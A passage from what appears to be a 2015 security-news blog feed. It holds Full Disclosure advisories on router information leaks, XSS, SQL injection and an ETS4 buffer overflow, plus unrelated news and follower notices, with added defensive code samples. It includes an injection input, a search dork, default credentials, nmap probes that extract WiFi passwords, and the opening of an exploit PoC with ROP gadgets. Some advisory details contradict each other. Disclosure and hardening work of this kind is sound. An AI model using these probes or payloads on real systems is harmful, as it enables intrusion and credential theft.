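    return db.execute(sql).fetchall()


def parse_id(raw, upper=2**31 - 1):
    """Accept only a plain ASCII decimal integer in range; reject the rest."""
    if not isinstance(raw, str) or not raw.isascii() or not raw.isdigit():
        raise BadRequest("TroncoID must be a positive integer")
    value = int(raw)
    if not 1 <= value <= upper:
        raise BadRequest("TroncoID out of range")
    return value


def fetch_hardened(db, tronco_id):
    """Validate the type first, then bind the value; it never reaches the SQL text."""
    value = parse_id(tronco_id)
    return db.execute(
        "SELECT id, title FROM tronco WHERE published = 1 AND id = ?", (value,)
    ).fetchall()


# Identifiers cannot be bound with "?", so a sort column is mapped through a
# fixed allowlist and only the mapped constant is placed in the statement.
SORT_COLUMNS = {"id": "id", "title": "title"}


def list_hardened(db, sort="id"):
    column = SORT_COLUMNS.get(sort)
    if column is None:
        raise BadRequest("unknown sort column")
    return db.execute(
        "SELECT id, title FROM tronco WHERE published = 1 ORDER BY " + column
    ).fetchall()
```

With the constructed input `1 OR 1=1`, the concatenated query returns the unpublished row as well, while the hardened function rejects the request before any SQL runs.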

Source: Gmail -> IFTTT-> Blogger

Anonymous declares cyber war on ISIS

The hacker activist group Anonymous vows to destroy ISIS propaganda and prevent future terrorist attacks.

from Google Alert - anonymous http://ift.tt/1HmV1m1
via IFTTT

Russian ATM Hackers Steal $4 Million in Cash with 'Reverse ATM Hack' Technique

Russian hackers have discovered a novel technique to rip off Millions of dollars from banks and ATMs. Criminals in Russia used a technique, called “Reverse ATM Attack,” and stole 252 Million Rubles (US$3.8 Million) from at least five different banks, according to the information obtained by Russian digital intelligence firm Group-IB. What is Reverse ATM Attack? According to the


from The Hacker News http://ift.tt/1IgqRfg
via IFTTT

ISS Daily Summary Report – 11/24/15

Sprint Ultrasound:  Kelly performed his Flight Day 240 thigh and calf ultrasound scans today with assistance from Lindgren and guidance from the Sprint ground team.  Ultrasound scans are used to evaluate spaceflight-induced changes in the muscle volume. The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Upon completion of this study, investigators expect to provide an integrated resistance and aerobic exercise training protocol capable of maintaining muscle, bone and cardiovascular health while reducing total exercise time over the course of a long-duration space flight. This will provide valuable information in support of the long term goal of protecting human fitness for even longer space exploration missions.   Fine Motor Skills:  Kornienko completed a session of the Fine Motor Skills experiment.  During the experiment he performed a series of interactive tasks on a touchscreen tablet. This investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. Fine Motor Skills sessions completed by Kelly and Kornienko will provide data for identification of trends or variations in fine motor performance in microgravity over the duration of their year-long space mission and upon their return to earth.   EXPRESS (EXpedite the PRocessing of Experiments to Space Station) Rack 6 Laptop Software Load:  Yui supported the ongoing software updates to ISS EXPRESS Rack laptops by copying a software load to the EXPRESS Rack 6 laptop.  These software updates include enhanced security with the Windows 7 operating system, new features and support for new capabilities.   
Crew Handover Conference:  Kelly, Volkov, and Kornienko conducted a video conference with Soyuz 45 Crew (Malenchenko, Kopra, and Peake) in order to pass along lessons learned. The purpose was to begin the handover process prior to the arrival on orbit through video conferences and data exchanges between the current crew and the upcoming crew.  Soyuz 45 is scheduled to launch from the Baikonur Cosmodrome on 15 December 2015.   Cygnus Robotics Onboard Trainer (ROBoT) Session 1:  Kelly, Lindgren, and Yui utilized a Robotic Trainer in order to practice nominal and off nominal Cygnus rendezvous and capture scenarios.  Orbital ATK (OA)-4 is scheduled to launch on December 3rd with rendezvous and berthing occurring December 6th.   Space Station Remote Manipulator System (SSRMS):  Today robotic ground controllers commanded the SSRMS to grapple the PMM Flight Releasable Grapple Fixture (FRGF) using Latching End Effector (LEE) B in support of the investigation into the rigidize mechanism anomaly that occurred during HTV-5 release.   Unloaded checkouts were performed on October 23rd.   Loaded checkouts were successfully performed today and the data gathered will be assessed by the team.  Then controllers performed LEE-B diagnostics on the prime string and SSRMS brake and joint diagnostics on both strings, in preparation for OA-4 capture and berthing in December.   Today’s Planned Activities All activities were completed unless otherwise noted. 
HMS – Optical Coherence Tomography (OCT) Setup Virus Definition File Update on Auxiliary Computer System (ВКС) Laptops USND2 – Hardware Activation Fluid Integrated Rack (FIR) – Review SPRINT – Scanning Ops Fine Motor Skills Eye Examination [Deferred] On MCC Go БД-2 Test SPRINT – Operator Assistance Photography of SM window 02, 12, and EV2 hatch glass in MRM2 FIR – ELC Hardware Setup HMS – OCT Equipment Stowage Removal of Video Equipment Used to capture БД-2 Exercise and Downlink the file Soyuz 717 Samsung Tablet Charge – start Evaluation of Orthostatic Stability with LBNP ER6 – Closeout Ops Clean Bench (CB)  Checkout WRS – Recycle Tank Fill [Deferred] JRNL – Journal Entry [Unmarked] Crew handover conference USND2 – Hardware Deactivation Disassembly of КЦП Unit (#10Ю=А805), S/N 004/СРС Health Maintenance System (HMS) – Blood Pressure Cuff Troubleshooting Fluid Integrated Rack (FIR) – Hardware Reconfiguration Symbolic Activity / r/g 0645 Express Rack Label Updates Filling (separation) EDV (KOV) No.1106 (00063570R, ФГБ1ПГО_1_111) from EDV No.1169 (00068247R, ФГБ1ПГО_1_107) for Elektron system Date and Time Synchronization on 6 RS photo cameras to the station time Repairs of SM Interior Panel 326 by Installing Overlay Panel – Day 2 Closing Lab window shutter within 3 meters of SSRMS operation ROBoT OBT  Session 1 Soyuz 717 Samsung tablet charging – end INTERACTION-2. 
Experiment Ops ER6 –  DVD insertion and SW load Unlatching N2 Nadir Hatch Hard Stops IMS Delta File Prep Fundoscope Exam Setup (instilling eye drops for a pupil dilation) СОЖ Maintenance WRS – Recycle Tank Fill HABIT – Experiment Ops [Unmarked] Fundoscope Setup for exam Disassembly of КЦП Unit (#10Ю=А805), S/N 004/СРС (FM) Fundoscope – Eye Exam Symbolic Activity Equipment stowage after Fundoscope Eye Imaging BLR48 – starting measurement Health Maintenance System (HMS) Profile of Mood States (POMS) Questionnaire FIR – Reconfig for nominal ops ER6 – DVD Removal from the Laptop Preparation of Reports for Roscosmos Web Site and Social Media ECON-M. Observation and Photography URAGAN Observations and Photography Installation of inserts to ease opening of SM interior panel locks (Unstow Structural Elements kit)   Completed Task List Items None   Ground Activities All activities were completed unless otherwise noted. SSRMS LEE-B Grapple of PMM FRGF and Data Gather NORS Heater Test   Three-Day Look Ahead: Wednesday, 11/25: Cygnus Robotics OBT, 44S Emergency OBT, HAPTICS-1 Ops, Port TRRJ Survey, ISS Reboost Thursday, 11/26: Crew Holiday Friday, 11/27:  RRM Transfer Cage Install, HAPTICS-1 Ops, Crew Departure Prep, Stbd CQ Cleaning, IMAX File D/L   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Norm Trace Contaminant Control System (TCCS) Lab Full Up Trace Contaminant Control System (TCCS) Node 3 Off  

from ISS On-Orbit Status Report http://ift.tt/1Igqv8i
via IFTTT

I have a new follower on Twitter


Autokids
Take care of your child's safety and comfort with http://t.co/nqbKcYYTkE – the best online store for children's car seats in Ukraine!

http://t.co/9YAM86YyEO
Following: 2398 - Followers: 2147

November 25, 2015 at 08:16AM via Twitter http://twitter.com/AutokidsUA

I have a new follower on Twitter


Gorde Center



Following: 1232 - Followers: 1008

November 25, 2015 at 07:58AM via Twitter http://twitter.com/GordeSchool

I have a new follower on Twitter


eatme
The eatme.ua restaurant portal is the best restaurant portal, one that always knows what you want.
Kyiv
http://t.co/w6Ws4K2WU7
Following: 2295 - Followers: 2071

November 25, 2015 at 07:45AM via Twitter http://twitter.com/eatmeua

I have a new follower on Twitter


cloudnews☁️
Today's Paper: Pictures, Videos, Latest Breaking Worldwide News
EU / US / Worldwide
https://t.co/tBqhN3ueaJ
Following: 4839 - Followers: 4673

November 25, 2015 at 07:27AM via Twitter http://twitter.com/ambassadorua

I have a new follower on Twitter


DomSporta
DomSporta is a professional store selling sports equipment and outdoor recreation goods.
Kyiv
http://t.co/1B8SjXoTaT
Following: 3442 - Followers: 2862

November 25, 2015 at 07:12AM via Twitter http://twitter.com/DomSportaua

This $10 Device Can Guess and Steal Your Next Credit Card Number before You've Received It

Imagine you have lost your credit card and applied for a fresh credit card from your bank. What if some criminal is using your new credit card before you have even received it? Yes, it's possible at least with this $10 device. Hardware hacker Samy Kamkar has built a $10 device that can predict and store hundreds of American Express credit card numbers, allowing anyone to use them for


from The Hacker News http://ift.tt/1OrDgS4
via IFTTT

I have a new follower on Twitter


OZON
The 1st all-in-one #Cybersecurity Solution designed for #eCommerce SMB. Full and immediate protection against hackers & fraudsters.
Worldwide
http://t.co/KUgvU0NDf6
Following: 1535 - Followers: 1447

November 25, 2015 at 04:45AM via Twitter http://twitter.com/ozon_io

I have a new follower on Twitter


Paw Kyhl Jensen
This is for the people who wants to follow the progress of developing TimeXtender.
Denmark
http://t.co/dVI6cS2a8U
Following: 1243 - Followers: 1206

November 25, 2015 at 04:21AM via Twitter http://twitter.com/pawkyhljensen

[FD] Celoxis <= 9.5 - Cross Site Scripting (XSS)

================================================================ Celoxis <= 9.5 - Cross Site Scripting (XSS) ================================================================ Information

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-020] SAP Mobile Platform 2.3 - XXE in application import

[FD] [ERPSCAN-15-019] SAP Afaria - Stored XSS

Application: SAP Afaria
Versions Affected: SAP Afaria 7, probably others
Vendor URL: http://SAP.com
Bugs: Stored XSS
Send: 18.02.2015
Reported: 18.02.2015
Vendor response: 18.02.2015
Date of Public Advisory: 11.08.2015
Reference: SAP Security Note 2152669
Author: Dmitry Chastukhin (ERPScan)

Description

1. ADVISORY INFORMATION

Title: SAP Afaria – Stored XSS
Advisory ID: [ERPSCAN-15-019]
Risk: High
Advisory URL: http://ift.tt/1LyII0P
Date published: 11.08.2015
Vendors contacted: SAP

2. VULNERABILITY INFORMATION

Class: XML External Entity [CWE-79]
Impact: Stored cross-site scripting, XSS, Afaria Server, Configuration Information Disclosure
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-6663

CVSS Information
CVSS Base Score: 4.3 / 10
CVSS Base Vector:
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) Medium (M)
Au : Authentication (Level of authentication needed to exploit) None (N)
C : Impact to Confidentiality None (N)
I : Impact to Integrity Partial (P)
A : Impact to Availability None (N)

3. VULNERABILITY DESCRIPTION

The SAP Afaria Server can be abused by attackers, allowing them to modify application content, persist the modified content without authorization, and potentially obtain authentication information of other legitimate users.

4. VULNERABLE PACKAGES

SAP Afaria 7
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2152669

6. AUTHOR

Dmitry Chastukhin (ERPScan)

7. TECHNICAL DESCRIPTION

Anonymous attackers can use special request to inject a malicious JS code by sending data to the attachment (q) on xComms port (by default, 3007).

8. REPORT TIMELINE

Send: 18.02.2015
Reported: 18.02.2015
Vendor response: 18.02.2015
Date of Public Advisory: 11.08.2015

9. REFERENCES

http://ift.tt/1LyII0P

10. ABOUT ERPScan Research

The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013.

ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies.

ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security.

ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few.

We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application Security provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial and Retail organizations to secure their mission-critical processes. Named as an ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP Solution providers” and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions.

ERPScan’s primary mission is to close the gap between technical and business security, and provide solutions to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both cyber-attacks and internal fraud. Usually our clients are large enterprises, Fortune 2000 companies and managed service providers whose requirements are to actively monitor and manage security of vast SAP landscapes on a global scale.

We ‘follow the sun’ and function in two hubs, located in Palo Alto and Amsterdam, to provide threat intelligence services, agile support and operate local offices and partner network spanning 20+ countries around the globe.

Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

I have a new follower on Twitter


Scott J. Weaver, Sr.
Consulting Firm that grows Business income via Web Design SEM SMM EM Marketing sched free call via - https://t.co/1pjmwqHzrg
Midwest
https://t.co/KHJ6A89MiH
Following: 1179 - Followers: 1497

November 25, 2015 at 02:10AM via Twitter http://twitter.com/SJWeaverMARKTNG

[FD] [ERPSCAN-15-018] SAP NetWeaver 7.4 - XXE

[FD] Leak information on Huawei HG253s v2, Comtrend VG 8050 and ADB P.DGA4001N (HomeStation)

Huawei HG253s v2

Vodafone-Spain is starting to rent a new Huawei HG253v2 router to its Spanish customers. This new router comes with a new firmware version. This bug was found by @VicenDominguez.

Vulnerability

The router does not validate the session cookie on some administration web pages, so it is possible to get information directly from these URLs on any router exposed to the internet:

http://IP/html_253s/api/ntwk/WlanBasic
http://IP/html_253s/api/system/diagnose_internet
http://IP/html_253s/api/system/hostinfo?type=ethhost
http://IP/html_253s/api/system/hostinfo?type=guesthost
http://IP/html_253s/api/system/hostinfo?type=homehost
http://IP/html_253s/api/system/hostinfo?type=wifihost
http://IP/html_253s/api/system/wizardcfg

Usage

    nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

    Nmap scan report for x.x.x.x (x.x.x.x)
    Host is up (0.34s latency).
    PORT STATE SERVICE
    80/tcp open http
    | http-enum-vodafone-hua253s:
    | SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
    | Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX

Comtrend VG 8050

Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to its Spanish customers. This new router comes with a new firmware version. This bug was found by @DaniLabs.

Vulnerability

The router does not validate the session cookie on some administration web pages, so it is possible to get information directly from these URLs on any router exposed to the internet:

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

Usage

    nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

    Nmap scan report for x.x.x.x (x.x.x.x)
    Host is up (0.34s latency).
    PORT STATE SERVICE
    80/tcp open http
    | http-enum-telefonica-comtrend-vg-8050:
    | SSID: MOVISTAR_XXX
    | Cipher Algorithm: WPA
    | Password WEP:
    | Password WPA: gTU3NkXE44RYjuM2RrxM
    | Password WPA2:
    | Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

ADB P.DGA4001N (HomeStation)

Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to its Spanish customers. This new router comes with a new firmware version. This bug was found by @DaniLabs.

Vulnerability

The router does not validate the session cookie on some administration web pages, so it is possible to get information directly from these URLs on any router exposed to the internet:

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

In addition, the default credentials are admin / 1234.

Usage

    nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

    Nmap scan report for x.x.x.x (x.x.x.x)
    Host is up (0.34s latency).
    PORT STATE SERVICE
    80/tcp open http
    | http-enum-telefonica-homestation:
    | SSID: WLAN_HOME
    | Cipher Algorithm: WEP
    | Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

The scripts are available here: http://ift.tt/1IfAA5u
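The flaw reported for all three routers is a session check that some administration pages lack. The sketch below shows the opposite design, where the dispatcher validates the session before any handler runs and public paths are the explicit exception. It is added example code, not vendor firmware: the route table, the cookie name `sid`, the handler bodies and the account data are assumptions, and only the paths are taken from the advisory.

```python
import hmac
import secrets
from http.cookies import CookieError, SimpleCookie

SESSIONS = set()            # server-side store of live session tokens
PUBLIC_PATHS = {"/login"}   # the only paths served without a session

# Handlers contain no auth logic, so a new page cannot "forget" the check.
ROUTES = {
    "/login": lambda: "login form",
    "/html_253s/api/ntwk/WlanBasic": lambda: "wlan settings",
    "/html_253s/api/system/hostinfo": lambda: "host list",
    "/getWifiInfo.jx": lambda: "wifi info",
    "/listDevices.jx": lambda: "device list",
}


def login(user, password, accounts):
    """Issue a random session token for valid credentials, else return None."""
    stored = accounts.get(user)
    if stored is None or not hmac.compare_digest(stored.encode(), password.encode()):
        return None
    token = secrets.token_urlsafe(32)
    SESSIONS.add(token)
    return token


def session_valid(cookie_header):
    """True only if the Cookie header carries a token the server issued."""
    try:
        jar = SimpleCookie(cookie_header or "")
    except CookieError:
        return False
    morsel = jar.get("sid")
    if morsel is None:
        return False
    presented = morsel.value.encode()
    return any(hmac.compare_digest(presented, t.encode()) for t in SESSIONS)


def dispatch(path, cookie_header=None):
    """Return (status, body). Authentication is decided here, before routing,
    so unknown paths also answer 401 to callers without a session."""
    path = path.split("?", 1)[0]
    if path not in PUBLIC_PATHS and not session_valid(cookie_header):
        return 401, "authentication required"
    handler = ROUTES.get(path)
    if handler is None:
        return 404, "not found"
    return 200, handler()


def reachable_without_session():
    """Regression check: every route that answers 200 with no cookie at all."""
    return sorted(p for p in ROUTES if dispatch(p)[0] == 200)
```

Running `reachable_without_session()` in a firmware test suite turns the advisory's finding into a failing test whenever a new page is exposed without a session.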

Source: Gmail -> IFTTT-> Blogger

Re: [FD] LiteCart 1.3.2: Multiple XSS

Hi, These vulnerabilities are similar, as both of them are issues with the query parameter of the search. However, the issue in version 1.1.2.1 exploits this line:

This issue was fixed in version 1.2 by passing the query parameter to htmlspecialchars before passing it to sprintf. The issue in version 1.3.2 is that the query parameter is also echoed unencoded inside the title tag, which is why the POC contains .

Best
Curesec Research Team

On 11/18/2015 at 6:50 PM, Henri Salo wrote:
> On Fri, Nov 13, 2015 at 05:07:01PM +0100, Curesec Research Team (CRT) wrote:
>> 2. XSS 1
>> http://localhost/ecommerce/litecart-1.3.2/public_html/en/search?query=">
>> 5. Solution
>> To mitigate this issue please upgrade at least to version 1.3.3:
>
> This seems to be the same vulnerability as CVE-2014-7183[1] found by
> Netsparker[2]. CVE-2014-7183 was fixed in version 1.2 according to the
> changelog.
>
> 1: http://ift.tt/1I2eZx2
> 2: http://ift.tt/1vXPYkU
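The situation described in the reply above (one reflected parameter, two output sinks, only one of them encoded) as an added Python sketch; it is not LiteCart code and not part of the original thread, and the templates, function names and marker string are assumptions. The checker renders a page with an inert marker containing markup characters and reports the enclosing tag of every place the marker comes back unencoded.

```python
import html
import re

# Constructed, inert marker containing the characters that matter for HTML
# encoding: double quote, angle brackets and single quote.
MARKER = 'zq"<mk>\'7'


def render_partial_fix(query):
    """Heading sink is encoded, the <title> sink is not (one fix, two sinks)."""
    return (
        "<html><head><title>Search results for " + query + "</title></head>"
        "<body><h1>Search results for " + html.escape(query) + "</h1></body></html>"
    )


def render_full_fix(query):
    """Encode once, at output time, for every HTML sink the value reaches."""
    safe = html.escape(query, quote=True)
    return (
        "<html><head><title>Search results for " + safe + "</title></head>"
        "<body><h1>Search results for " + safe + "</h1></body></html>"
    )


def unencoded_reflections(render, marker=MARKER):
    """Render the page with the marker as input and return, for each raw copy
    of the marker in the output, the name of the nearest preceding open tag."""
    page = render(marker)
    sinks = []
    for hit in re.finditer(re.escape(marker), page):
        opened = re.findall(r"<([a-zA-Z][a-zA-Z0-9]*)[^>]*>", page[: hit.start()])
        sinks.append(opened[-1] if opened else "?")
    return sinks
```

A check like this belongs in the regression tests for the original fix, so that a second sink for the same parameter is caught when the template changes.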

Source: Gmail -> IFTTT-> Blogger

[FD] Cross Site Scripting (XSS) 0day in SimpleViewer all versions

########################################################################################################
Cross Site Scripting (XSS) & Content spoofing in SimpleViewer all versions via remote xml payload [2015]
########################################################################################################
EAT, SLEEP, HACK, REPEAT
########################################################################################################

Vendor: http://ift.tt/1PNEhan
Vulnerable application: simpleviewr.swf
Vulnerability: Execution of javascript and content spoofing
Version: All versions seem vulnerable with modified payloads
Dork: filetype:swf intext:SimpleViewer
Credits: @APT1337, @kelodymelody

SimpleViewer is a free image gallery viewer which comes as a swf flash script which loads a gallery of images from a local gallery.xml file. SimpleViewer is used on hundreds of thousands of web servers by a range of different users from bloggers all the way to government.

After receiving no feedback from the developers of SimpleViewer in regards to this vulnerability and attempting to reach out to numerous affected customers of SimpleViewer, again with no feedback, I feel the need to disclose this vulnerability in full, publicly, so that people can remove SimpleViewer from their websites. I did try to warn you... @NASA, @NYCOURTS, @IEEE, @MIT, @ACM.

SimpleViewer is able to load the gallery.xml file in a number of different ways:

http://www.example.com/viewer.swf
The above example loads gallery.xml locally on the server.

http://ift.tt/1Xq1rCI
The above example loads gallery.xml or another .xml file defined using the xmlDataPath variable.

http://ift.tt/1PNEhao
The above example loads a remote gallery.xml file, provided the remote server has a cross-domain policy. This can allow an attacker to include remote malicious xml files into the SimpleViewer application.

SimpleViewer does not check that the gallery.xml file being loaded is stored locally within the same domain, or that it is being loaded from a known/safe remote location. SimpleViewer can be forced to load remote malicious galleries, provided that the server with the remote gallery has a cross-domain policy file (crossdomain.xml). This means that an attacker can load a remote malicious xml file into SimpleViewer, which can allow the attacker to both spoof content and execute javascript within the context of the user's browser. This can be used by an attacker to trick users into logging in to a fake login page to steal login information, or to trick users into downloading malicious files.

Before we can exploit this vulnerability in SimpleViewer we must first create a cross-domain policy file (crossdomain.xml) which allows SimpleViewer to fetch the payload from our server. The crossdomain.xml file would consist of the following code:

The above crossdomain.xml file should be placed in the webroot of the remote server where the remote gallery.xml file is located.

SimpleViewer allows the user to customize their gallery using a number of different variables which are set within the gallery.xml file. Below is a small list of variables that can be used within the gallery.xml file:

title - Text to display as gallery title.
imagePath - Relative or absolute path to images folder.
thumbPath - Relative or absolute path to thumbnail images folder.
backgroundImagePath - Relative or absolute path to a JPG or SWF to load as the gallery background.

An example of one of these gallery.xml files can be found on simpleviewer.net, which is provided as a demo located at the following URL:

Gallery: http://ift.tt/1Xq1uhK

SimpleViewer.

Source: Gmail -> IFTTT-> Blogger

[FD] : CVE-2015-8298 SQL Injection Vulnerability in RXTEC RXAdmin

### RXTEC_20150513

#### Title:
SQL injection vulnerability in the RXTEC RXAdmin Login Page allows remote attackers to execute arbitrary SQL commands via several HTTP parameters.

#### Type of vulnerability:
SQL injection

##### Attack outcome:
It is possible to extract all information from the database in use by the application. Depending on the configuration of the SQL server arbitrary code execution might be possible.

#### Impact:
Critical

#### Software/Product name:
RXTEC RXAdmin Login

#### Affected versions:
UPDATE : 06 / 2012

#### Fixed in version:
*unknown*

#### Vendor:
RXTEC (www.rxtec.net)

#### CVE number:
CVE-2015-8298

#### Timeline
* `2015-04-30` identification of vulnerability
* `2015-05-11` vendor contact (won't fix because of outdated version)
* `2015-07-14` contact cve-request@mitre.

#### Credits:
Thomas Konrad `tkonrad@sba-research.org` (SBA Research)

#### Description:
The following parameters are affected by the vulnerability:

* /index.htm (loginpassword parameter)
* /index.htm (loginusername parameter)
* /index.htm (additional parameter)
* /index.htm (additional parameter)
* /index.htm (rxtec cookie)
* /index.htm (groupid parameter)

#### Proof-of-concept:
*none*

Source: Gmail -> IFTTT-> Blogger

[FD] : CVE-2015-8299 RCE Vulnerability in the KNX management software ETS

#### Title:
Remote code execution vulnerability in the KNX management software ETS

#### Category/Abstract:
Buffer overflow vulnerability

#### Product:
ETS (Engineering Tool Software)

#### Affected versions:
* ETS 4.1.5 (Build 3246)

*no other versions tested*

#### Fixed in version:
*unknown*

#### Vendor:
KNX Association

#### Impact:
Critical

#### CVE number:
CVE-2015-8299

#### Timeline
* `2013-10-11` identification of vulnerability
* `2013-10-??` 1st vendor contact, no-reply of vendor on issue
* `2013-07-30` 2nd vendor contact, no-reply of vendor on issue
* `2013-10-06` 3rd vendor contact, no-reply of vendor on issue
* `2015-07-14` contact cve-request@mitre.

#### Credits:
Aljosha Judmayer `ajudmayer@sba-research.org` (SBA Research)

#### References:
* Information on ETS: http://ift.tt/1OrmcM0
* KNX Association: http://www.knx.org/

#### Description:
The vulnerability is caused by a buffer overflow in a memcpy operation when parsing specially crafted KNXnet/IP packets in the Group messages monitor (aka. Falcon). A corresponding proof-of-concept exploit, which was tested on an affected ETS version installed on Windows XP SP3, can be found below. The proof-of-concept exploit generates the UDP packet which triggers the vulnerability and should at least crash the application (it requires python and scapy to run).

#### Proof-of-concept:
Since this is just a PoC, the ROP chain was not carefully selected and might require adaptation to reproduce the desired results on your system.

knAx.py:

```
#!/usr/bin/env python
"""
ETS4 buffer overflow exploit PoC

This is a Proof-of-Concept (PoC) remote exploit of an ETS4 which is
currently running the monitoring software for group messages
aka. "Groupenmonitor". This feature of the ETS4 runs an executable
called "Falcon.exe" which is vulnerable to a buffer overflow.

The vulnerable function gets called at:
0043C994 call overflow_43C743

This function, which is responsible for the overflow, is located
at 0x43c743.
The "memcpy" which produces the overflow gets called at:
0043C931 call memcpy

Vulnerable version:
ETS 4.1.5 (Build 3246)
Stammdaten: Version 57, Schema 1.1
registry key: "NET Framework Setup"
v2.0.50727 -version 2.2.30729
v4 -version 4.0.30319

ETS4.exe
LegalCopyright: Copyright \xa9 2010-2012 KNX Association cvba, Brussels, Belgium
Assembly Version: 4.1.3246.36180
InternalName: ETS4.exe
FileVersion: 4.1.3246.36180
CompanyName: KNX Association cvba
Comments: ETS4 Application
ProductName: ETS4
ProductVersion: 4.1.3246.36180
FileDescription: ETS4
OriginalFilename: ETS4.exe

Falcon.exe
LegalCopyright: Copyright (C) 2000-2008 KNX Association, Brussels, Belgium
InternalName: Falcon
FileVersion: 2.0.5184.4346
CompanyName: KNX Association
SpecialBuild: 2011.01.16
LegalTrademarks: KNX Association
OLESelfRegister:
ProductVersion: 2.0
FileDescription: Falcon
OriginalFilename: Falcon.ex

Tested on:
Windows XP SP3 32bit

This exploit uses return-oriented-programming techniques.
The gadgets used for ROP are:
ole32.dll:"0x774fdb5b","33c0c3","0x774fdb5b: xor eax, eax | 0x774fdb5d: ret | "
ole32.dll:"0x77550f6f","83c064c3","0x77550f6f: add eax, 64h | 0x77550f72: ret | "
ole32.dll:"0x774ff447","03c4c24e77","0x774ff447: add eax, esp | 0x774ff449: ret 774eh | "
user32.dll:"0x7e467666","94c3","0x7e467666: xchg esp, eax | 0x7e467667: ret | "

The exploit requires root privileges to send the crafted packet
and the scapy python module!

PoC and vuln. discovery by aljosha judmayer
"""
from struct import pack,unpack
from scapy.all import *
#
```

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2015-8300: Polycom BToE Connector v2.3.0 Privilege Escalation Vulnerability

#### Title:
Polycom BToE Connector up to version 2.3.0 allows unprivileged Windows users to execute arbitrary code with SYSTEM privileges.

#### Type of vulnerability:
Privilege Escalation

##### Exploitation vector:
local

##### Attack outcome:
Code execution with SYSTEM privileges.

#### Impact:
CVSS Base Score 6,2
CVSS v2 Vector (AV:L/AC:L/Au:S/C:C/I:C/A:N)

#### Software/Product name:
Polycom BToE Connector

#### Affected versions:
All Versions including 2.3.0

#### Fixed in version:
Version 3.0.0 (Released March 2015)

#### Vendor:
Polycom Inc.

#### CVE number:
CVE-2015-8300

#### Timeline
* `2014-12-19` identification of vulnerability
* `2015-01-01` vendor contacted via customer
* `2015-03-01` vendor released fixed version 3.0.0
* `2015-07-14` contact cve-request@mitre.

#### Credits:
Severin Winkler `swinkler@sba-research.org` (SBA Research)
Ulrich Bayer `ubayer@sba-research.org` (SBA Research)

#### References:
Download secure version 3.0.0 http://ift.tt/1CDMWon

#### Description:
The Polycom BToE Connector up to version 2.3.0 allows a local user to gain local administrator privileges. The software creates a Windows service running with SYSTEM privileges using the following file (standard installation path):

C:\program files (x86)\polycom\polycom btoe connector\plcmbtoesrv.exe

The default installation allows everyone to replace the plcmbtoesrv.exe file, allowing unprivileged users to execute arbitrary commands on the Windows host.

#### Proof-of-concept:
*none*
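A defender-side check for the condition described above, as an added example (not part of the advisory and not Polycom's code): it parses `icacls` output for a service binary and reports ACEs that let ordinary users replace the file. Both ACL listings are constructed samples, the function names are hypothetical, and English principal names are assumed.

```python
import re

# Service binary path as given in the advisory.
SERVICE_BINARY = r"C:\program files (x86)\polycom\polycom btoe connector\plcmbtoesrv.exe"

# Principals that include ordinary local users (English Windows names; an assumption).
BROAD_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# icacls tokens that are inheritance/type markers rather than rights.
FLAG_TOKENS = {"I", "OI", "CI", "IO", "NP", "DENY"}
# icacls rights that allow overwriting, deleting or re-permissioning the file.
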